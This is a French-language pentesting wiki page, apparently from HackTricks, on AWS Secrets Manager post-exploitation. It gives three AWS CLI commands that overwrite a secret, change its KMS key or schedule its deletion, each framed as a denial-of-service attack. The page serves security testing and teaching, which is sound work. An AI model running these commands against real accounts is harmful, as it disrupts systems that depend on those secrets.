# AWS - Secrets Manager Post Exploitation

{{#include ../../../banners/hacktricks-training.md}}

## Secrets Manager

Pour plus d'informations, consultez :

{{#ref}}
../aws-services/aws-secrets-manager-enum.md
{{#endref}}

### Lire les Secrets

Les **secrets eux-mêmes sont des informations sensibles**, [consultez la page privesc](../aws-privilege-escalation/aws-secrets-manager-privesc.md) pour apprendre comment les lire.

### DoS Changer la Valeur du Secret

Changer la valeur du secret pourrait **DoS tout le système qui dépend de cette valeur.**

> [!WARNING]
> Notez que les valeurs précédentes sont également stockées, il est donc facile de revenir à la valeur précédente.
```bash
# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"
```
### DoS Changer la clé KMS
```bash
aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE
```
### DoS Suppression de Secret

Le nombre minimum de jours pour supprimer un secret est de 7
```bash
aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7
```
{{#include ../../../banners/hacktricks-training.md}}
